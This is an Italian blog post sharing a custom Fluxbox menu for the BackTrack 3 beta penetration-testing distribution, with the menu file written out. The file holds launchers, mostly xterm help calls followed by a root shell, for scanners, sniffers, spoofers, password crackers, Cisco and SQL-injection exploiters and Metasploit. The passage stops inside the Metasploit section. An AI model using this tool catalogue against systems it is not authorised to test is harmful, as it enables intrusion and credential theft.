Ho aggiunto , vista la necessità , anche i link ai programmi che riguardano la configurazione di KDE , senza alterare , se non per correzione , quelli riguardanti la configurazione di Fluxbox.

Quando andrete a sostituire il menu originale di Fluxbox quindi , non vi ritroverete più la struttura suddivisa in directory come al solito di Fluxbox , ma come quelle in KDE , con tanto di links al web , (che verranno eseguiti non con konqueror ma con Firefox) , e sottodirectory specifiche per ogni cosa , insomma identico a quello presente in KDE.

Se trovate un programma che non si avvia , dopo aver controllato l’ eventualità che sia un bug , vi prego di dirmelo in modo da poter mettere a posto ogni piccola parte.

In una distribuzione come BackTrack credo che un Windows Manager come Fluxbox sia importante , per questo ho voluto rifarlo tutto da zero , in modo che possa ritoccarlo anche in futuro , questo anche il perché della mia scelta di mettere le sezione come in KDE , che spero possiate apprezzare.

Detto questo , è stato un lavoro molto lungo , ho impegato molto tempo a fare e disfare il menù ma vista la mia totale assoluzione a Fluxbox non credo che avrei potuto farne a meno…..

……spero di aver fatto cosa gradita.

(se volete fatevi un backup , ma visto che i links sono in granparte corrotti , non penso che vi possa andare male in qualche modo.)

Vi prego di farmi notare qualsiasi cosa , anche la più ovvia , c’é la mia mail nella pagina /c0ntacts e anche all’ interno dello stesso file…

Questo il nuovo menu di Fluxbox per BackTrack:

Scaricate il file quì , magari mettendolo , (in sovrascrittura) , dirrettamente in /root/.fluxbox/…..

qui il codice… …è su DivShare , chi non vuole aspettare per fare il download vi ricordo che basta cliccare su Skip-Ad in alto a destra.

Prendete questo codice solo come dimostrazione , il menu cambiatelo tramite download al link sopra , purtroppo la formattazione , anche in html , del blog restituisce le ” come ? , quindi fatevi il download e dopo aver fatto il backup se volete potete direttamente salvare il file in /root/.fluxbox/ in modo da crearvi subito il vostro menu.

***

##############################################################################
#                                                                            #
#                              brigante                                      #
#                                                                            #
#                   Fluxbox menu for BackTrack-3beta                         #
#                                                                            #
#  for notify , correction , broken/missing links , please mail-me at:       #
#                                                                            #
#                       brigante00@gmail.com                                 #
#                                                                            #
#                                                                            #
##############################################################################
#                                                                            #
#                                                                            #
#           any help , suggestion and other is appreciated.                  #
#                                                                            #
#                                                                            #
##############################################################################
[begin] (...::: Flux | Box :::...)
  [exec] (Run Command...) {fbrun}
[separator]
  [exec] (xTerm) {xterm -geom 89x37 -title "xterm" -e "cd ~ ; sudo -s"}
  [exec] (Konsole) {konsole}
 [separator]
[submenu] (Editor.)
      [exec] (SciTe) {SciTE}
      [exec] (Kate) {kate}
      [exec] (KEdit) {kedit}
      [exec] (kWrite) {kwrite}
      [exec] (Kommander) {kmdr-editor %F}
      [exec] (kJots) {kjots}
[end]
[submenu] (0ffice)
      [exec] (Kde-Fax) {kfax %f   -caption "%c" %i %m}
      [exec] (kFAX-Viewer) {kfaxview %f}
      [exec] (PDF Viewer) {kpdf}
      [exec] (KGhostView) {kghostview %u -caption "%c" %i %m}
[end]
[submenu] (Graphics)
	[exec] (kdvi) {kdvi %f -caption "%c" %i %m}
	[exec] (KColorChooser) {kcolorchooser %i %m}
	[exec] (kcoloredit) {kcoloredit %i %m %U}
	[exec] (kiconedit) {kiconedit -caption "%c" %i %m %u}
	[exec] (kolourpaint) {kolourpaint %u}
	[exec] (kpovmodeler) {kpovmodeler -caption "%c" %i %m %f}
	[exec] (kruler) {kruler %i %m}
	[exec] (kuickshow) {kuickshow %i %m -caption "%c" %U}
	[exec] (kview) {kview -caption "%c" %i %m %U}
	[exec] (kooka) {kooka %i %m %U}
[end]
[separator]
    [submenu] (<<< Back | Track :::-)
         [submenu] (Information Gathering)
	    [submenu] (Online-Res.)
              [submenu] (Search-Engine)
               [exec] (nic.uk) {firefox http://www.google.com/}
	       [exec] (Google.com) {firefox http://www.google.com/}
	       [exec] (Google-Operators) {firefox http://www.google.com/help/operators.html}
	       [exec] (InfoSeek) {firefox http://www.infoseek.com/}
	       [exec] (Kartoo.com) {firefox http://www.kartoo.com/}
	       [exec] (AltheWeb.com) {firefox http://www.altheweb.com/}
	       [exec] (Dogpile.com) {firefox http://www.dogpile.com/}
              [end]
                [exec] (nic.uk) {firefox http://www.nic.uk/}
		[exec] (ripe.net) {firefox http://www.ripe.net/}
		[exec] (samspade.org) {firefox http://www.samspade.org/}
		[exec] (nic.ar) {firefox http://www.nic.ar/}
		[exec] (netcraft.com) {firefox http://www.netcraft.com/}
		[exec] (lanic.net) {firefox http://www.lanic.net/}
		[exec] (internic.net) {firefox http://www.internic.net}
		[exec] (dnsreport.com) {firefox http://www.dnsreport.com/}
		[exec] (arin.net) {firefox http://www.arin.net/}
		[exec] (archive.org) {firefox http://www.archive.org/}
		[exec] (apnic.net) {firefox http://www.apnic.net/}
		[exec] (allwhois.com) {firefox http://www.allwhois.com/}
		[exec] (afrinic.net) {firefox http://www.afrinic.net/}
		[exec] (Soc.Netlist) {firefox http://en.wikipedia.org/wiki/List_of_social_networking_websites}
             [end]
	    [submenu] (Whois)
                [exec] (Maltego) {cd /pentest/enumeration/maltegoKZ3/bin/ ; maltego}
		[exec] (Dmitry) {xterm -geom 90x35 -title "dmitry" -e "dmitry -h ; sudo -s"}
	    [end]
	  [submenu] (Archive)
	    [exec] (Finger Google) {xterm -geom 90x30 -title "Finger Google" -e "cd /pentest/enumeration/google/fingergoogle-1.1 ; /pentest/enumeration/google/fingergoogle-1.1/fingergoogle.py ; sudo -s"}
	     [exec] (MetaGoofil) {xterm -geom 93x30 -title "MetaGoofil" -e " cd /pentest/enumeration/google/metagoofil/  ; metagoofil.py ; sudo -s"}
	   [end]
	   [submenu] (DNS)
	      [exec] (DiG) {xterm -geom 90x50 -title "DiG" -e "dig -h ; sudo -s"}
	      [exec] (DNSEnum) {xterm -geom 60x30 -title "DNSenum" -e "cd /pentest/enumeration/dnsenum/ ; /pentest/enumeration/dnsenum/dnsenum.pl;sudo -s"}
	      [exec] (DNSWalk) {xterm -geom 60x30 -title "DNSWalk" -e "cd /pentest/enumeration/dns/dnswalk ; /pentest/enumeration/dns/dnswalk/dnswalk; sudo -s"}
	      [exec] (DNS-Bruteforce) {xterm -geom 60x30 -title "DNS-Bruteforce" -e "cd /pentest/enumeration/dns/dns-bruteforce ; ./DNSBruteforce.py;sudo -s"}
	      [exec] (DnsMap) {xterm -geom 80x30 -title "DnsTracer" -e "dnsmap ; sudo -s"}
	      [exec] (DNS-Predict) {xterm -geom 93x30 -title "DNS-Predict" -e " cd /pentest/enumeration/google/dns-predict-v.0.0.2/ ; dnspredict.pl* --help;sudo -s"}
	      [exec] (DnsTracer) {xterm -geom 90x30 -title "DnsTracer" -e "dnstracer ; sudo -s"}
	      [exec] (Fierce) {xterm -geom 80x30 -title "Fierce" -e "cd /pentest/enumeration/fierce ; perl fierce.pl -help;sudo -s"}
	      [exec] (Host) {xterm -geom 60x30 -title "Host" -e "host ; sudo -s"}
            [end]
            [submenu] (Route)
	      [exec] (0trace) {xterm -geom 90x35 -title "0trace" -e "sh 0trace.sh -h ; sudo -s"}
              [exec] (FireWalk) {xterm -geom 80x30 -title "FireWalk" -e "firewalk -h ; sudo -s"}
              [exec] (Ass) {xterm -geom 60x30 -title "Ass" -e "ass ; sudo -s"}
	      [exec] (I-Trace) {xterm -geom 67x30 -title "I-Trace" -e "itrace -h ; sudo -s"}
	      [exec] (InTrace) {xterm -geom 110x25 -title "InTrace" -e "intrace -h ; sudo -s"}
	      [exec] (Netenum) {xterm -geom 120x30 -title "NetEnum" -e "netenum ; sudo -s"}
	      [exec] (Netmask) {xterm -geom 120x30 -title "NetMask" -e "netmask -h ; sudo -s"}
	      [exec] (Protos) {xterm -geom 80x30 -title "Protos" -e "protos -h ; sudo -s"}
	      [exec] (TCTrace) {xterm -geom 80x30 -title "TCTrace" -e "tctrace -h ; sudo -s"}
	      [exec] (TCP-traceroute) {xterm -geom 80x30 -title "TCP-traceroute" -e "tcptraceroute ; sudo -s"}
            [end]
	   [submenu] (SMTP)
	     [exec] (Dmitry) {xterm -geom 90x35 -title "dmitry" -e "dmitry -h ; sudo -s"}
	     [exec] (Goog Mail Enum) {xterm -geom 90x30 -title "Goog Mail Enum" -e "cd /pentest/enumeration/google/ ; /pentest/enumeration/google/goog-mail.py ; sudo -s"}
	     [exec] (Maltego) {cd /pentest/enumeration/maltegoKZ3/bin/ ; maltego}
	     [exec] (Relay Scanner) {xterm -geom 100x50 -title "Relay Scanner" -e "cd /pentest/enumeration/relayscanner ;/pentest/enumeration/relayscanner/RelayScanner.pl -h ; sudo -s"}
	     [exec] (Piranha) {xterm -geom 80x50 -title "Piranha" -e "cd /pentest/fuzzers/pirana ; ./pirana.pl;sudo -s"}
	   [end]
	[end]
    [submenu] (Network Mapping)
	[submenu] (Identify Live Host)
	   [exec] (0trace) {xterm -geom 90x35 -title "0trace" -e "sh 0trace.sh -h ; sudo -s"}
	   [exec] (AutoScan) {/opt/AutoScan/bin/autoscan-network}
	   [exec] (FPing) {xterm -geom 90x30 -title "FPing" -e "fping -h;sudo -s"}
	   [exec] (NetCat) {xterm -geom 90x35 -title "netcat" -e "netcat -h;sudo -s"}
	   [exec] (Hping2) {xterm -geom 91x53 -title "Hping2" -e "hping2 --help ; sudo -s"}
	   [exec] (Hping3) {xterm -geom 91x53 -title "Hping3" -e "hping3 --help ; sudo -s"}
	   [exec] (NetCat) {xterm -geom 90x35 -title "netcat" -e "netcat -h;sudo -s"}
	   [exec] (NetDiscover) {xterm -geom 99x26 -title "NETdiscover" -e "netdiscover -h ; sudo -s"}
	   [exec] (Nmap) {xterm -geom 90x35 -title "Nmap" -e "nmap -h ; sudo -s"}
	   [exec] (NmapFE) {nmapfe}
	   [exec] (OutputPBNJ) {xterm -geom 70x37 -title "PBNJ" -e "pbnj -h ; sudo -s"}
	   [exec] (ScanPBNJ) {xterm -geom 90x50 -title "ScanPBNJ" -e "scanpbnj -h ; sudo -s"}
	   [exec] (TCP-traceroute) {xterm -geom 80x30 -title "TCP-traceroute" -e "tcptraceroute ; sudo -s"}
	   [exec] (UnicornScan) {xterm -geom 95x30 -title "UnicornScan" -e "unicornscan -help ; sudo -s"}
	[end]
	[submenu] (OS-Fingerprinting)
	   [exec] (Ass) {xterm -geom 60x30 -title "Ass" -e "ass ; sudo -s"}
	   [exec] (AutoScan) {/opt/AutoScan/bin/autoscan-network}
	   [exec] (Nmap) {xterm -geom 90x35 -title "Nmap" -e "nmap -h ; sudo -s"}
	   [exec] (NmapFE) {nmapfe}
	   [exec] (p0f) {xterm -geom 90x35 -title "p0f" -e "p0f -h;sudo -s"}
	   [exec] (Protos) {xterm -geom 80x30 -title "Protos" -e "protos -h ; sudo -s"}
	   [exec] (SinFP) {xterm -geom 80x50 -title "SinFP" -e "/usr/local/sinfp/bin/sinfp.pl ; sudo -s"}
	   [exec] (UnicornScan) {xterm -geom 95x30 -title "UnicornScan" -e "unicornscan -help ; sudo -s"}
	   [exec] (XProbe2) {xterm -geom 92x37 -title "xProbe2" -e "xprobe2 -h ; sudo -s"}
	[end]
        [submenu] (Portscanning)
	   [exec] (AutoScan) {/opt/AutoScan/bin/autoscan-network}
	   [exec] (GenList) {xterm -geom 88x30 -title "GenList" -e "genlist -h ; sudo -s"}
	   [exec] (NetCat) {xterm -geom 90x35 -title "netcat" -e "netcat -h;sudo -s"}
	   [exec] (Nmap) {xterm -geom 90x35 -title "Nmap" -e "nmap -h ; sudo -s"}
	   [exec] (NmapFE) {nmapfe}
	   [exec] (OutputPBNJ) {xterm -geom 70x37 -title "PBNJ" -e "pbnj -h ; sudo -s"}
	   [exec] (ScanPBNJ) {xterm -geom 90x50 -title "ScanPBNJ" -e "scanpbnj -h ; sudo -s"}
	   [exec] (UnicornScan) {xterm -geom 95x30 -title "UnicornScan" -e "unicornscan -help ; sudo -s"}
	[end]
	[submenu] (Service-Fingerprinting)
	   [exec] (Amap) {xterm -geom 60x30 -title "Amap" -e "amap -h ; sudo -s"}
	   [exec] (HttpRecon) {cd /pentest/enumeration/www/httprecon-1.3/ ; wine httprecon.exe ; sudo -s}
	   [exec] (Httprint) {xterm -geom 90x50 -title "Httprint" -e "cd /pentest/web/httprint/ ; httprint -h ; sudo -s"}
	   [exec] (HttprintGUI) {cd /pentest/enumeration/www/httprint_301/win32 ; wine httprint_gui.exe ; sudo -s}
	[end]
	[submenu] (VPN)
	   [exec] (IKE Scan) {xterm -geom 90x50 -title "IKE Scan" -e "ike-scan ; sudo -s"}
	   [exec] (IkeProbe) {xterm -geom 80x50 -title "IkeProbe" -e "cd /pentest/vpn/ikeprobe/;wine ikeprobe.exe ; sudo -s"}
	   [exec] (PSK crack) {xterm -geom 90x30 -title "PSK Crack" -e "psk-crack ; sudo -s"}
	[end]
      [end]
      [submenu] (Privilege-Escalation)
	 [submenu] (Password-Attacks)
	   [exec] (FPGA) {xterm -geom 80x50 -title "FPGA" -e "cd /opt/oc-v0.5/ ; ls -l ; sudo -s"}
	   [exec] (chntpw) {xterm -geom 80x50 -title "chntpw" -e "cd /pentest/password/chntpw/ ; chntpw ; sudo -s"}
	    [submenu] (Password-OFFline-Attacks)
	       [submenu] (Rainbow-Crack)
	         [exec] (RTgen) {xterm -geom 120x45 -title "RTgen" -e "cd /pentest/password/rcrack ; rtgen;sudo -s"}
	         [exec] (RTDump) {xterm -geom 120x45 -title "RTDump" -e "cd /pentest/password/rcrack ; rtdump;sudo -s"}
                 [exec] (Rcrack) {xterm -geom 60x30 -title "Rcrack" -e "cd /pentest/password/rcrack/; rcrack ; sudo -s"}
                 [exec] (Rtsort) {xterm -geom 60x30 -title "Rtsort" -e "cd /pentest/password/rcrack/;  rtsort  ;  sudo -s"}
	       [end]
	      [exec] (Crunch-DictGen) {xterm -geom 120x30 -title "Crunch-Dictionary Generator" -e "cd /pentest/password/ ; crunch -h ; sudo -s"}
	      [exec] (Jhon The Ripper) {xterm -geom 170x45 -title "Jhon The Ripper" -e "cd /usr/local/john-1.7.2/; start-john.sh ; sudo -s"}
	      [exec] (Rcrack) {xterm -geom 60x30 -title "Rcrack" -e "cd /pentest/password/rcrack/; rcrack ; sudo -s"}
	      [exec] (RTgen) {xterm -geom 120x45 -title "RTgen" -e "cd /pentest/password/rcrack ; rtgen;sudo -s"}
	      [exec] (RTDump) {xterm -geom 120x45 -title "RTDump" -e "cd /pentest/password/rcrack ; rtdump;sudo -s"}
	      [exec] (Rtsort) {xterm -geom 60x30 -title "Rtsort" -e "cd /pentest/password/rcrack/;  rtsort  ;  sudo -s"}
	      [exec] (THC-OracleCracker) {wine /pentest/windows-binaries/misc/thc-orakelcrackert11g.exe}
	      [exec] (Wyd) {xterm -geom 115x35 -title "Wyd" -e "cd /usr/local/wyd ; wyd.pl; sudo -s"}
	     [end]
	    [submenu] (Password-ONline-Attacks)
	      [exec] (Hydra) {xterm -geom 125x50 -title "Hydra" -e "hydra ; sudo -s"}
	      [exec] (Lodowep) {xterm -geom 125x30 -title "Lodowep" -e "cd /pentest/password/lodowep/;cat readme;sudo -s"}
	      [exec] (Medusa) {xterm -geom 120x30 -title "Medusa" -e "medusa ; sudo -s"}
	      [exec] (SSHater) {xterm -geom 130x30 -title "SSHater" -e "cd /pentest/password/sshatter/;./SSHatter.pl;sudo -s"}
	      [exec] (TFTP-Brute) {xterm -geom 115x35 -title "TFTP-Brute" -e "cd /pentest/password/TFTP-bruteforce/ ; ./tftpbrute.pl ; sudo -s"}
	      [exec] (THC PPTP) {xterm -geom 90x30 -title "THC PPTP" -e "thc-pptp-bruter ; sudo -s"}
	      [exec] (VNCrack) {xterm -geom 90x40 -title "VNCrack" -e "vncrack ; sudo -s"}
	      [exec] (XHydra) {xhydra}
	    [end]
	 [end]
	 [submenu] (Sniffer)
	     [exec] (DHCPdump) {xterm -geom 72x30 -title "DHCPdump" -e "man dhcpdump;sudo -s"}
	     [exec] (driftnet) {xterm -geom 72x30 -title "driftnet" -e "cd /usr/local/driftnet ;driftnet -h;sudo -s"}
	     [exec] (Dsniff) {xterm -geom 80x30 -title "Dsniff" -e "dsniff -? ; sudo -s"}
	     [exec] (Etherape) {etherape}
	     [exec] (Ettercap) {ettercap -G}
	     [exec] (HTTPcapture) {xterm -geom 80x50 -title "httpcapture" -e "httpcapture -h ; sudo -s"}
	     [exec] (nTop) {xterm -geom 120x45 -title "nTop" -e "start-ntop ; sudo -s"}
	     [exec] (PHoss) {xterm -geom 120x45 -title "Phoss" -e "PHoss -h ; sudo -s"}
	     [exec] (SipDump) {xterm -geom 90x30 -title "SipDump" -e "sipdump ; sudo -s"}
	     [exec] (SMB-Sniffer) {xterm -geom 100x50 -title "SMB-Sniffer" -e "cd /pentest/exploits/framework2;start-smb-sniffer;sudo -s"}
	     [exec] (Split) {xterm -geom 90x30 -title "Split" -e "split --help ; sudo -s"}
	     [exec] (SSLdump) {xterm -geom 60x30 -title "SSldump" -e "ssldump -h ; sudo -s"}
	     [exec] (TCPick) {xterm -geom 120x45 -title "TCPick" -e "tcpick --help;sudo -s"}
	     [exec] (Tracer) {xterm -geom 85x45 -title "Tracer" -e "python ./tracer.py ; sudo -s"}
	     [exec] (Wireshark) {wireshark}
	 [end]
	 [submenu] (Spoofing)
	     [exec] (cdp) {xterm -geom 72x30 -title "cdp" -e "cdp ; sudo -s"}
	     [exec] (DHCP-X-Flooder) {xterm -geom 72x30 -title "DHCP-X-Flooder" -e "dhcpx;sudo -s"}
	     [exec] (Ettercap) {ettercap -G}
	     [exec] (file2cable) {xterm -geom 85x45 -title "File2Cable" -e "file2cable;sudo -s"}
	     [exec] (HSRP-Spoofer) {xterm -geom 80x50 -title "HSRP" -e "hsrp ; sudo -s"}
	     [exec] (ICMP-Redirect) {xterm -geom 80x50 -title "ICMP-Redirect" -e "icmp_redirect;sudo -s"}
	     [exec] (IGRP-Route-Injection) {xterm -geom 80x50 -title "IGRP-Route-Injection" -e "igrp;sudo -s"}
	     [exec] (Irdp-Responder) {xterm -geom 80x50 -title "Irdp-Responder" -e "irdpresponder;sudo -s"}
	     [exec] (Nemesis) {xterm -geom 120x30 -title "Nemesis" -e "nemesis -h ; sudo -s"}
	     [exec] (NetEnum) {xterm -geom 80x30 -title "NetEnum" -e "netenum ; sudo -s"}
	     [exec] (Netmask) {xterm -geom 120x30 -title "NetMask" -e "netmask -h ; sudo -s"}
	     [exec] (NetSed) {xterm -geom 90x40 -title "NetSed" -e "netsed -h ; sudo -s"}
	     [exec] (Packit) {xterm -geom 120x45 -title "Packit" -e "packit ; sudo -s"}
	     [exec] (Scapy) {xterm -geom 120x45 -title "Scapy" -e "scapy.py;sudo -s"}
	     [exec] (SSLdump) {xterm -geom 60x30 -title "SSldump" -e "ssldump -h ; sudo -s"}
	     [exec] (SING) {xterm -geom 90x40 -title "SING" -e "sing -h;sudo -s"}
	     [exec] (TCP-Prep) {xterm -geom 120x45 -title "TCP-Prep" -e "tcpprep -h;sudo -s"}
	     [exec] (TCP-Replay) {xterm -geom 120x45 -title "TCP-Replay" -e "tcpreplay -h;sudo -s"}
	     [exec] (TCP-Bridge) {xterm -geom 85x45 -title "TCP-Bridge" -e "tcpbridge -h 2>&1| head -n 20; echo "Output is truncated. Use tcpbridge -h to see full list of options"; echo ; sudo -s"}
	     [exec] (TCP-Rewrite) {xterm -geom 120x45 -title "TCP-Rewrite" -e "tcprewrite -h;sudo -s"}
	     [exec] (Timestamp) {xterm -geom 120x45 -title "Timestamp" -e "timestamp -h;sudo -s"}
	 [end]
      [end]
      [submenu] (Vulnerability Identifycation)
	[submenu] (Cisco)
	   [exec] (CiscoAuditingTool) {xterm -geom 90x37 -title "Cisco-Audithing-Tool" -e "cd /pentest/cisco/CiscoAuditingTool/ ; CAT; sudo -s"}
	   [exec] (CiscoGlobalExploiter) {xterm -geom 85x45 -title "Cisco Exploiter" -e "cd /pentest/cisco/cisco-global-exploiter ; ./cge.pl ; sudo -s"}
	   [exec] (CiscoOCS-MassScanner) {xterm -geom 90x37 -title "Cisco.OCS-MassScanner" -e "cd /pentest/cisco/cisco-ocs-0.1/ ; ocs; sudo -s"}
	   [exec] (Cisco.Pwd-Scanner) {xterm -geom 127x35 -title "Cisco-Password-Scanner" -e "cd /pentest/cisco/ciscos-1.3/ ; ciscos; sudo -s"}
	   [exec] (Cisco Torch) {xterm -geom 93x52 -title "Cisco Torch" -e "cd /pentest/cisco/cisco-torch-0.4b/ ; ./cisco-torch.pl ; sudo -s"}
	   [exec] (CiscoMergeRouter) {xterm -geom 80x40 -title "CiscoMergeRouter" -e " cd /pentest/cisco/copy-router-config-v.0.1/ ; perl merge-router-config.pl; sudo -s"}
	   [exec] (Yersinia) {xterm -geom 100x40 -title "Yersinia" -e "yersinia -h ; sudo -s"}
	[end]
	[submenu] (Database)
	   [submenu] (Generic)
	      [exec] (Absinthe) {xterm -geom 60x30 -title "Absinthe" -e "cd /pentest/database/Absinthe-1.4.1/bin/ ; runabsinthe.sh"}
	      [exec] (Blind-Sqlix) {xterm -geom 129x41 -title "Blind-Sqlix" -e "cd /pentest/database/blindSQLiX_v1.0/;ls -l;sudo -s"}
	      [exec] (HackOmatix) {xterm -geom 80x50 -title "Hack-O-Matix" -e "cd /pentest/database/hackomatix/ ; ls -l; sudo -s"}
	      [exec] (SqlNinja) {xterm -geom 90x40 -title "SqlNinja" -e "cd /ninja/ ; ./sqlninja -h ; sudo -s"}
	      [exec] (Sql-Brute) {xterm -geom 140x45 -title "Sql-Brute" -e "cd /pentest/web/ ; sqlbrute.py -h ; sudo -s"}
	      [exec] (Sqlix) {xterm -geom 155x32 -title "Sqlix" -e "cd /pentest/database/SQLiX_v1.0/ ; ./SQLiX.pl ; sudo -s"}
	      [exec] (SqlLibF) {xterm -geom 130x32 -title "SqlLibF" -e "sqlibf ; sudo -s"}
	   [end]
	   [submenu] (MS-SQL)
	      [exec] (SQLdict) {wine /pentest/windows-binaries/misc/sqldict.exe}
	      [exec] (SqlMAP) {xterm -geom 87x31 -title "SqlMap" -e "cd /pentest/database/sqlmap/ ; sqlmap.py -h ; sudo -s"}
	   [end]
	   [submenu] (Oracle)
	      [exec] (GetSids) {xterm -geom 75x55 -title "GetSids" -e "getsids ; sudo -s"}
	      [exec] (Metacoretex) {/pentest/database/oracle/metacoretex-0.8.0/mctx.sh}
	      [exec] (TNScmd) {xterm -geom 98x30 -title "TnsCMD" -e "cd /usr/local/bin/ ; tnscmd.pl ; sudo -s"}
	   [end]
	[end]
	[submenu] (Fuzzers)
	   [exec] (TNScmd) {xterm -geom 98x30 -title "TnsCMD" -e "cd /usr/local/bin/ ; tnscmd.pl ; sudo -s"}
	   [exec] (Bunny) {xterm -geom 60x30 -title "Bunny" -e "cd /pentest/fuzzers/bunny/ ; ls ; sudo -s"}
	   [exec] (CIRT Fuzzer) {xterm -geom 96x52 -title "CIRT Fuzzer" -e "cd /pentest/fuzzers/cirt-fuzzer ; /pentest/fuzzers/cirt-fuzzer/fuzzer.pl -help ; sudo -s"}
	   [exec] (CLFuzz) {xterm -geom 85x35 -title "CLFuzz" -e "clfuzz.py ; sudo -s"}
	   [exec] (Filep) {xterm -geom 80x40 -title "Filep" -e "cd /usr/local/filep/ ; python file.py -h ; sudo -s"}
	   [exec] (FuzzBall2) {xterm -geom 85x55 -title "FuzzBall2" -e "fuzzball2 ; sudo -s"}
	   [exec] (JBroFuzzer) {java -jar /pentest/fuzzers/jbrofuzz-0.7/jbrofuzz-07.jar; sudo -s}
	   [exec] (Mistress) {xterm -geom 80x50 -title "Mistress" -e "cd /pentest/fuzzers/mistress/ ; ls -l ; sudo -s"}
	   [exec] (notSPIKEfile) {xterm -geom 112x45 -title "notSPIKEfile" -e "notSPIKEfile ; sudo -s"}
	   [exec] (Peach) {xterm -geom 100x40 -title "Peach" -e "cd /pentest/fuzzers/Peach-1.0 ; ls -l ; sudo -s"}
	   [exec] (Protos-H323) {xterm -geom 91x50 -title "Protos-Voip" -e "cd /pentest/fuzzers/protos-voip ; java -jar c07-h2250v4-r2.jar; sudo -s"}
	   [exec] (Protos-Sip) {xterm -geom 95x50 -title "Protos-Sip" -e "cd /pentest/fuzzers/protos-voip ; java -jar c07-sip-r2.jar; sudo -s"}
	   [exec] (Spike) {xterm -geom 100x50 -title "Spike" -e "cd /pentest/fuzzers/spike/src ; ls ; sudo -s"}
	   [exec] (Taof) {xterm -geom 70x40 -title "Taof" -e "cd /pentest/fuzzers/taof/ ; python ./taof.py -h ; sudo -s"}
	   [exec] (ZZuf) {xterm -geom 120x50 -title "ZZuf" -e "zzuf --help ; sudo -s"}
	[end]
	[submenu] (Security Scanner)
	   [exec] (GFI-Languard) {wine /root/.wine/drive_c/Program\ Files/GFI/LANgaurd\ Network\ Scanner/Languard.exe}
	[end]
	[submenu] (SMB-Analisys)
	   [exec] (RPCdump) {xterm -geom 93x43 -title "RPCdump" -e "rpcdump.py ; sudo -s"}
	   [exec] (SambaScan) {xterm -geom 95x50 -title "SambaScan" -e "cd /usr/local/bin/ ; sambascan2 -h ; sudo -s"}
	   [exec] (Samrdump) {xterm -geom 120x20 -title "Samrdump" -e "samrdump.py  ; sudo -s"}
	   [exec] (smb4k) {smb4k}
	   [exec] (SMBclient) {xterm -geom 85x45 -title "SMBclient" -e "smbclient.py -h ; sudo -s"}
	[end]
	[submenu] (SNMP-Analisys)
	   [exec] (ADMsmnp) {xterm -geom 100x35 -title "ADMsmnp" -e "ADMsnmp ; sudo -s"}
	   [exec] (Mibble MIB Browser) {cd /pentest/enumeration/mibble-2.8/bin/ ; MibbleBrowser.sh}
	   [exec] (Onesixtyone) {xterm -geom 60x30 -title "Onesixtyone" -e "cd /pentest/scanners/onesixtyone-0.3.2 /pentest/scanners/onesixtyone-0.3.2/onesixtyone ; sudo -s"}
	   [exec] (SNMPcheck) {xterm -geom 85x40 -title "snmpcheck" -e "cd /pentest/enumeration/snmpenum/ ;perl ./snmpcheck-1.6.pl -h ; sudo -s"}
	   [exec] (Snmp Enum) {xterm -geom 60x30 -title "Snmp Enum" -e "cd /pentest/enumeration/snmpenum ; /pentest/enumeration/snmpenum/snmpenum.pl ; sudo -s"}
	   [exec] (Snmpwalk) {xterm -geom 60x30 -title "Snmpwalk" -e "snmpwalk ; sudo -s"}
	[end]
	[submenu] (Web-Analisys)
	  [exec] (ASP-Audit) {xterm -geom 100x32 -title "ASP-Audit" -e "asp-audit.pl ; sudo -s"}
	  [exec] (BurpeSuite) {java -jar /usr/local/bin/burpsuite_v1.1_beta2.jar ; sudo -s}
	  [exec] (CUrl) {xterm -geom 95x53 -title "cUrl" -e "curl -h ; sudo -s"}
	  [exec] (Halberd) {xterm -geom 80x50 -title "Halberd" -e "halberd --help ; sudo -s"}
	  [exec] (HttpRecon) {cd /pentest/enumeration/www/httprecon-1.3/ ; wine httprecon.exe ; sudo -s}
	  [exec] (Httprint) {xterm -geom 90x50 -title "Httprint" -e "cd /pentest/web/httprint/ ; httprint -h ; sudo -s"}
	  [exec] (HttprintGUI) {cd /pentest/enumeration/www/httprint_301/win32 ; wine httprint_gui.exe ; sudo -s}
	  [exec] (ISR Forms) {xterm -geom 60x30 -title "ISR Forms" -e "cd /pentest/enumeration/isr-form-1.0 ; /pentest/enumeration/isr-form-1.0/isr-form.pl ; sudo -s"}
	  [exec] (List Urls) {xterm -geom 60x30 -title "List Urls" -e "cd /pentest/enumeration/list-urls ; /pentest/enumeration/list-urls/list-urls.py ; sudo -s"}
	  [exec] (Lynx) {xterm -geom 80x40 -title "lynx" -e "lynx --help ; sudo -s"}
	  [exec] (Metoscan) {xterm -geom 60x40 -title "Metoscan" -e "metoscan ; sudo -s"}
	  [exec] (Mezcal) {mezcal}
	  [exec] (Nikto) {xterm -geom 110x30 -title "Nikto" -e "cd /pentest/web/nikto/ ; /pentest/web/nikto/nikto.pl ; sudo -s"}
	  [exec] (OpenSSL-Scanner) {xterm -geom 88x30 -title "OpenSSH" -e "openssl-scanner ; sudo -s"}
	  [exec] (ParosProxy) {cd /pentest/web/paros/;java -Xmx96m -jar paros.jar ; sudo -s}
	  [exec] (Put) {xterm -geom 80x50 -title "Put" -e "cd /pentest/web/ ; put.pl ; sudo -s"}
	  [exec] (Stompy) {xterm -geom 110x35 -title "Stompy" -e "stompy ; sudo -s"}
	  [exec] (SWF-Intruder) {firefox file:///pentest/web/swfintruder/index.html}
	  [exec] (w3af) {xterm -geom 98x50 -title "w3af" -e "cd /pentest/web/w3af/ ; w3af ;sudo -s"}
	  [exec] (WebScarab-Lite) {cd /pentest/web/;java -Xmx256m -jar webscarab.jar}
	[end]
      [end]
     [submenu] (Penetration)
	 [exec] (Inguma) {xterm -geom 60x30 -title "Inguma" -e "cd /pentest/exploits/inguma/; inguma.py ; sudo -s"}
	 [exec] (Fast-Track) {xterm -geom 60x30 -title "Fast-Track" -e "cd /pentest/misc/ ; fast-track.py"}
	   [submenu] (MetasploitExploitationFramework)
            [submenu] (Framework-V.2)
		 [exec] (MsfCli 2) {xterm -geom 60x30 -title "MsfCli 2" -e "cd /pentest/exploits/framework2 ;/pentest/exploits/framework2/msfcli ; sudo -s"}
	          [exec] (MsfConsole 2) {xterm -geom 60x30 -title "MsfConsole 2" -e "cd /pentest/exploits/framework2 ;/pentest/exploits/framework2/msfconsole ; sudo -s"}
		  [exec] (MsfUpdate 2) {xterm -geom 60x30 -title "MsfUpdate 2" -e "cd /pentest/exploits/framework2 ;/pentest/exploits/framework2/msfupdate -u ; sudo -s"}
	          [exec] (MsfWeb 2) {xterm -geom 60x30 -title "MsfWeb 2" -e "cd /pentest/exploits/framework2 ;/pentest/exploits/framework2/msfweb ; sudo -s"}
	    [end]
	      [submenu] (Framework-V.3)
	          [exec] (MsfConsole 3) {xterm -geom 60x30 -title "MsfConsole 3" -e "cd /pentest/exploits/framework3 ;/pentest/exploits/framework3/msfconsole ; sudo -s"}
